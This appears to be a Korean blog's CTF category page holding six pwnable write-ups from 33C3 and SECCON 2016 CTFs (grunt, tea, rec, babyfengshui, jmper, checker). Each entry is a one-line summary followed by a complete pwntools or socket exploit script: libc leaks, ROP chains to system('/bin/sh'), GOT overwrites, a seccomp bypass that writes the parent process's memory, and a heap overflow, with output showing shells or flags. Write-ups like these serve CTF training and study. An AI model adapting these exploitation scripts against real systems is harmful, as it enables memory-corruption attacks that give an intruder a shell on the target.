'CTF/2016'에 해당하는 글 6건

33C3 CTF - grunt

CTF/2016 2018. 12. 14. 18:54

Category : pwnable


Summary : lua script, oob, integer overflow



Exploit

#!/usr/bin/python

from pwn import *
import sys

s = process('./grunt')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
rg = s.recvregex
sl = s.sendline
ss = s.send

script = '''
-- Lukachu
-- Hannobat
-- Andyball
-- Airmackly

function trigger(obj)
pokemon.swapAttack(obj, 0, 1) -- 1 2
pokemon.duplicateAttack(obj) -- 1 2 2
end

local strlen_got = 0x626070

for i=0,5 do
pokemon.new("dummy")
end
mon = pokemon.new("pwn3r")
target = pokemon.new("overwriteme")

pokemon.addAttack(mon, trigger)
pokemon.fight(mon, "Airmackly")

pokemon.doDamage(target, 0x100000064 - strlen_got)
pokemon.swapAttack(mon, 0x10, 0x12)
-- gdb-peda$ x/8wx 0x1981ed8
-- 0x1981ed8: 0x00000064 0x00000000 0x019825f0 0x00000000

leak = pokemon.getName(target) .. "\\x00\\x00"
libc_base = string.unpack("<I8", leak) - 0x8b720
libc_system = libc_base + 0x45390

pokemon.setName(target, string.pack("<I8", libc_system))
pokemon.setName(target, "/bin/sh;")

return libc_base
'''
s.send(script.ljust(0x1000, '\x00'))

s.interactive()
s.close()



$ python ex.py 
[+] Starting local process './grunt': pid 8174
>>>
[*] Switching to interactive mode
pwn3r is stopped by a wild Airmackly!

Round 1
pwn3r hits Airmackly for 0 damage!
Airmackly uses TROUTSLAP!

Round 2
pwn3r hits Airmackly for 0 damage!
Airmackly uses INCAPACITATE!

Round 3
pwn3r hits Airmackly for 0 damage!
Airmackly uses INCAPACITATE!
The fight has ended

$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)


'CTF > 2016' 카테고리의 다른 글

33C3 CTF - grunt  (0) 2018.12.14
33C3 CTF - tea  (0) 2018.12.14
33C3 CTF - rec  (0) 2018.12.14
33C3 CTF - babyfengshui  (0) 2018.12.14
SECCON CTF QUAL 2016 - jmper  (1) 2017.01.02
SECCON CTF QUAL 2016 - checker  (0) 2017.01.02

WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret

33C3 CTF - tea

CTF/2016 2018. 12. 14. 18:53

Category : pwnable


Summary : bypass seccomp, close(0x8000000000000002), overwrite parent process memory



Exploit

#!/usr/bin/python

from pwn import *

s = process('./tea')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
rg = s.recvregex
sl = s.sendline
ss = s.send

def parse_maps(maps):
res = {}
get_base = lambda x : int(x.split('-')[0], 16)
for line in maps.splitlines():
if 'r-x' in line and 'libc' in line:
res['libc_base'] = get_base(line)
res['child_stack'] = get_base(line) - 0x100000000000
return res

def get_ppid(status):
for line in status.splitlines():
if line.startswith('PPid:'):
return int(line[6:])


def step(filename, count, done=False, stdin=False, data='', exp=False):
ru('access?\n')
sl('r')
ru('filename?\n')
sl(filename)
ru('lseek?\n')
sl(str(0))
ru('count?\n')
sl(count)
if stdin:
time.sleep(0.3)
ss(data)
if exp:
return None
length = int(rg('read \d+ bytes\n').split(' ')[1])
res = rr(length)
ru('quit? (y/n)')
sl('y' if done else 'n')
return res

ppid = get_ppid(step('/proc/self/status', str(0x1000)))
maps = parse_maps(step('/proc/self/maps', str(0x1000)))
libc_system = maps['libc_base'] + 0x45390
libc_argv = maps['libc_base'] + 0x3c92f8
# gadgets
libc_sh_string = maps['libc_base'] + 0x0011e70
libc_open = maps['libc_base'] + 0xf7030
libc_write = maps['libc_base'] + 0xf72b0
libc_close = maps['libc_base'] + 0xf78e0
libc_clone_fini = maps['libc_base'] + 0x10741d
libc_lseek = maps['libc_base'] + 0x107440
libc_pop_rdi = maps['libc_base'] + 0x00021102
libc_pop_rsi = maps['libc_base'] + 0x000202e8
libc_pop_rdx = maps['libc_base'] + 0x001150a6

leak = step('/proc/self/fd/0', str(-0x80000000), False, stdin=True,
data='a'*0x28 + p64(0) + p64(3) + p64(libc_argv))
stack = u64(leak[0:8])
parent_waitpid_retaddr = stack - 0x130

leak = step('/proc/self/fd/0', str(-0x80000000), False, stdin=True,
data
='a'*0x28 + p64(0) + p64(3) + p64(stack - 0x110))
child_read_retaddr = maps['child_stack'] + u64(leak[0:8]) - 0x68

pay = ''
pay += p64(libc_pop_rdi)
pay += p64(0x8000000000000001) # 1 (stdout)
pay += p64(libc_close)

pay += p64(libc_pop_rdi)
pay += p64(child_read_retaddr + 8 * 23 + 8 * 3)
pay += p64(libc_pop_rsi)
pay += p64(2)
pay += p64(libc_open)

pay += p64(libc_pop_rdi)
pay += p64(1)
pay += p64(libc_pop_rsi)
pay += p64(parent_waitpid_retaddr)
pay += p64(libc_pop_rdx)
pay += p64(0)
pay += p64(libc_lseek)

pay += p64(libc_pop_rdi)
pay += p64(1)
pay += p64(libc_pop_rsi)
pay += p64(child_read_retaddr + 8 * 23)
pay += p64(libc_pop_rdx)
pay += p64(8 * 3)
pay += p64(libc_write)

pay += p64(libc_clone_fini)

pay += p64(libc_pop_rdi)
pay += p64(libc_sh_string)
pay += p64(libc_system)
pay += '/proc/{}/mem\x00'.format(ppid)

step('/proc/self/fd/0', str(-0x80000000).ljust(0x28, '\x00') + p64(0) + p64(3) + p64(child_read_retaddr),
False
, stdin=True, data=pay, exp=True)


s.interactive()
s.close()


$ python ex.py 
[+] Starting local process './tea': pid 2211
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)


'CTF > 2016' 카테고리의 다른 글

33C3 CTF - grunt  (0) 2018.12.14
33C3 CTF - tea  (0) 2018.12.14
33C3 CTF - rec  (0) 2018.12.14
33C3 CTF - babyfengshui  (0) 2018.12.14
SECCON CTF QUAL 2016 - jmper  (1) 2017.01.02
SECCON CTF QUAL 2016 - checker  (0) 2017.01.02

WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret

33C3 CTF - rec

CTF/2016 2018. 12. 14. 18:53

Category : pwnable


Summary : uninitialized variable



Exploit

#!/usr/bin/python

from pwn import *


def cmd_polish_sum(nums):
ru('> ')
sl(str(2))
ru('Operator: ')
sl('S')
for i in range(len(nums)):
ru('Operand: ')
sl(str(nums[i]))
ru('Operand: ')
sl('.')
rl()

def cmd_sign(num):
ru('> ')
sl(str(5))
sl(str(num))

def cmd_read_note():
ru('> ')
sl(str(1))
ru('Your note: ')
note = rl(False)
return note


s = process('./rec')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

leak = cmd_read_note()
pie_base = u32(leak[4:8]) - 0x6fb
sh_string = pie_base + 0x10cc
libc_base = u32(leak[8:12]) - 0x1b0d60
libc_system = libc_base + 0x3a940
print hex(libc_base)

pay = [0 for i in range((0x380 - 0x24 - 8 - 0x44 + 8) / 8)]
pay.append(libc_system - 0x100000000)
pay.append(sh_string)
cmd_polish_sum(pay)
cmd_sign(0)

s.interactive()
s.close()


$ python ex.py 
[+] Starting local process './rec': pid 129954
0xf7d4b000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)



'CTF > 2016' 카테고리의 다른 글

33C3 CTF - grunt  (0) 2018.12.14
33C3 CTF - tea  (0) 2018.12.14
33C3 CTF - rec  (0) 2018.12.14
33C3 CTF - babyfengshui  (0) 2018.12.14
SECCON CTF QUAL 2016 - jmper  (1) 2017.01.02
SECCON CTF QUAL 2016 - checker  (0) 2017.01.02

WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret

33C3 CTF - babyfengshui

CTF/2016 2018. 12. 14. 18:53

Category : pwnable


Summary : heap overflow




Exploit

#!/usr/bin/python

from pwn import *

def cmd_add(alloc_size, input_size, name, data):
ru('Action')
sl(str(0))
ru('size of description: ')
sl(str(alloc_size))
ru('name: ')
sl(name)
ru('text length: ')
sl(str(input_size))
ru('text: ')
sl(data)

def cmd_del(idx):
ru('Action')
sl(str(1))
ru('index: ')
sl(str(idx))


def cmd_show(idx):
ru('Action')
sl(str(2))
ru('index: ')
sl(str(idx))
ru('name: ')
name = rl(False)
ru('description: ')
desc = rl(False)
return name, desc


def cmd_update(idx, input_size, data):
ru('Action')
sl(str(3))
ru('index: ')
sl(str(idx))
ru('text length: ')
sl(str(input_size))
ru('text: ')
sl(data)

free_got = 0x0804b010

s = process('./babyfengshui')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

cmd_add(0x20, 0x20, 'name', 'desc')
cmd_add(0x10, 0x10, 'overwriteme', 'desc2')
cmd_add(0x20, 0x20, 'name3', 'desc3')
cmd_add(0x100, 0x100, 'name4', 'sh')
cmd_del(0)
cmd_del(2)

pay = ''
pay += 'a' * 0x80
pay += p32(0) + p32(0x19)
pay += 'a' * 0x10
pay += p32(0) + p32(0x89)
pay += p32(free_got)
pay += 'overwriteok'

cmd_add(0x80, len(pay), 'name', pay)
_, leak = cmd_show(1)
libc_base = u32(leak[0:4]) - 0x70750
libc_system = libc_base + 0x3a940

cmd_update(1, 4, p32(libc_system))
cmd_del(3)

s.interactive()
s.close()


$ python ex.py 
[+] Starting local process './babyfengshui': pid 128654
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)



'CTF > 2016' 카테고리의 다른 글

33C3 CTF - grunt  (0) 2018.12.14
33C3 CTF - tea  (0) 2018.12.14
33C3 CTF - rec  (0) 2018.12.14
33C3 CTF - babyfengshui  (0) 2018.12.14
SECCON CTF QUAL 2016 - jmper  (1) 2017.01.02
SECCON CTF QUAL 2016 - checker  (0) 2017.01.02

WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret

Category : Pwnables 


jmper

Summary : off by one to rop, setjmp



Exploit

#!/usr/bin/python


from socket import *

from struct import pack, unpack

import time


def rc(s, ch):

    res = ''

    while ch not in res:

        res += s.recv(1)

    return res


#def ror64(value, count):


def ROR(data, shift, size=64):

    shift %= size

    body = data >> shift

    remains = (data << (size - shift)) - (body << size)

    return (body + remains)


p = lambda x : pack("<Q", x)

up = lambda x : unpack("<Q", x)[0]



HOST = '127.0.0.1'

PORT = 9999


HOST = 'jmper.pwn.seccon.jp'

PORT = 5656


libc_start_main_got = 0x601FB0


def add_student(s):

    s.send('1\n')


def name_student(s, idx, name):

    s.send('2\n')

    rc(s, 'ID:')

    s.send(str(idx) + '\n')

    rc(s, 'Input name:')

    s.send(name)


def memo_student(s, idx, memo):

    s.send('3\n')

    rc(s, 'ID:')

    s.send(str(idx) + '\n')

    rc(s, 'Input memo:')

    s.send(memo)


def show_name(s, idx):

    s.send('4\n')

    rc(s, 'ID:')

    s.send(str(idx) + '\n')

    return rc(s, '1. Add')[:-6]


def show_memo(s, idx):

    s.send('5\n')

    rc(s, 'ID:')

    s.send(str(idx) + '\n')

    return rc(s, '1. Add')[:-6]



s = socket(AF_INET, SOCK_STREAM)

s.connect((HOST, PORT))

raw_input(">>")

rc(s, '6. Bye :)\n')

add_student(s)  # 0


rc(s, '6. Bye :)\n')

add_student(s)  # 0


rc(s, '6. Bye :)\n')

memo_student(s, 0, 'a'*32 + '\x08')


rc(s, '6. Bye :)\n')

heap_leak = up(show_name(s, 0).ljust(8, '\x00'))

print 'heap leak : ', hex(heap_leak)

jmp_buf = heap_leak - 0xf8 + 0x30 #(rsp, rip)


rc(s, '6. Bye :)\n')

memo_student(s, 0, 'a'*32 + '\x78')


rc(s, '6. Bye :)\n')

name_student(s, 0, p(jmp_buf)+'\n')


rc(s, '6. Bye :)\n')

rsp_rip = show_name(s, 1)[:16]

rsp = up(rsp_rip[:8])

rip = up(rsp_rip[8:])

fs_val = ROR(rip, 0x11, 64) ^ 0x0400C31

rsp = ROR(rsp, 0x11, 64) ^ fs_val


print 'rsp : ', hex(rsp)

# ror 0x11 ^ fs[0x30]


rc(s, '6. Bye :)\n')

name_student(s, 0, p(libc_start_main_got)+'\n')


rc(s, '6. Bye :)\n')

libc_start_main_libc = up(show_name(s, 1)[:8].ljust(8, '\x00'))

libc_base = libc_start_main_libc - 0x000000000021e50

system_libc = libc_base + 0x0000000000046590

pop_rdi = libc_base + 0x0000000000022b9a

# 0000000000046590 <__libc_system@@GLIBC_PRIVATE>:

# 0000000000021e50 <__libc_start_main@@GLIBC_2.2.5>:

# 0000000000022b9a : pop rdi ; ret

print 'libc_start_main_libc : ', hex(libc_start_main_libc)

print 'system_libc : ', hex(system_libc)


payload =''

payload += p(pop_rdi)

payload += p(heap_leak+0x50)

payload += p(system_libc)




# overwrite ret

rc(s, '6. Bye :)\n')

name_student(s, 0, p(rsp + 0x18)+'\n')

rc(s, '6. Bye :)\n')

name_student(s, 1, payload+'\n')


# for arg "sh"

rc(s, '6. Bye :)\n')

memo_student(s, 1, "sh"+'\n')


for i in range(0, 29 - 2):

    rc(s, '6. Bye :)\n')

    add_student(s)  # 0



time.sleep(0.1)

s.send('ls -l\n')

time.sleep(0.1)

raw_input('> ')

print s.recv(1024)

s.send('cat flag\n')

raw_input('> ')

print s.recv(1024)


s.close()


"""

    pwn3r$ python jmper_exploit.py

    >>

    heap leak :  0x239a208

    rsp :  0x7ffe73389820L

    libc_start_main_libc :  0x7fcf6c59ee50

    system_libc :  0x7fcf6c5c3590

    >

    1. Add student.

    2. Name student.

    3. Write memo

    4. Show Name

    5. Show memo.

    6. Bye :)

    1. Add student.

    2. Name student.

    3. Write memo

    4. Show Name

    5. Show memo.

    6. Bye :)

    Exception has occurred. Jump!

    Nice jump! Bye :)

    total 20

    -r--r--r-- 1 root root    32 Dec  8 16:20 flag

    -rwxr-xr-x 1 root root 13044 Dec  8 15:30 jmper

    

    >

    Traceback (most recent call last):

    File "jmper_exploit.py", line 138, in <module>

    print s.recv(1024)


    pwn3r$ python jmper_exploit.py

    >>

    heap leak :  0x78e208

    rsp :  0x7ffd5c7655e0L

    libc_start_main_libc :  0x7f6915ae2e50

    system_libc :  0x7f6915b07590

    > 

    1. Add student.

    2. Name student.

    3. Write memo

    4. Show Name

    5. Show memo.

    6. Bye :)

    1. Add student.

    2. Name student.

    3. Write memo

    4. Show Name

    5. Show memo.

    6. Bye :)

    Exception has occurred. Jump!

    Nice jump! Bye :)

    

    > 

    SECCON{3nj0y_my_jmp1n9_serv1ce}

"""


'CTF > 2016' 카테고리의 다른 글

33C3 CTF - grunt  (0) 2018.12.14
33C3 CTF - tea  (0) 2018.12.14
33C3 CTF - rec  (0) 2018.12.14
33C3 CTF - babyfengshui  (0) 2018.12.14
SECCON CTF QUAL 2016 - jmper  (1) 2017.01.02
SECCON CTF QUAL 2016 - checker  (0) 2017.01.02

WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  1개가 달렸습니다.
secret

Category : Pwnables 


checker

Summary : memory leak with SSP protection




Exploit

#!/usr/bin/python


from socket import *

from struct import pack, unpack

import time


def rc(s, ch):

    res = ''

    while ch not in res:

        res += s.recv(1)

    return res


p = lambda x : pack("<L", x)

up = lambda x : unpack("<L", x)[0]


HOST = 'checker.pwn.seccon.jp'

PORT = 14726


target = "a"*0x178+"\xc0\x10\x60\x00\x00\x00\x00\x00"


s = socket(AF_INET, SOCK_STREAM)

s.connect((HOST, PORT))

rc(s, 'NAME : ')

s.send('pwn3r\n')


rc(s, '>> ')

s.send('a'*(len(target) - 1)+'\n')

rc(s, '>> ')

s.send('a'*(len(target) - 2)+'\n')

rc(s, '>> ')

s.send('a'*(len(target) - 3)+'\n')

rc(s, '>> ')

s.send('a'*(len(target) - 4)+'\n')

rc(s, '>> ')

s.send(target[:0x178+3]+'\n')

rc(s, '>> ')

s.send('yes'+'\n')


rc(s, 'FLAG : ')

s.send('gogo\n')


time.sleep(1)

print s.recv(1024)


s.close()


"""

    pwn3r$ python check_exploit.py

    You are a liar...

    *** stack smashing detected ***: SECCON{y0u_c4n'7_g37_4_5h3ll,H4h4h4} terminated

    

"""



'CTF > 2016' 카테고리의 다른 글

33C3 CTF - grunt  (0) 2018.12.14
33C3 CTF - tea  (0) 2018.12.14
33C3 CTF - rec  (0) 2018.12.14
33C3 CTF - babyfengshui  (0) 2018.12.14
SECCON CTF QUAL 2016 - jmper  (1) 2017.01.02
SECCON CTF QUAL 2016 - checker  (0) 2017.01.02

WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret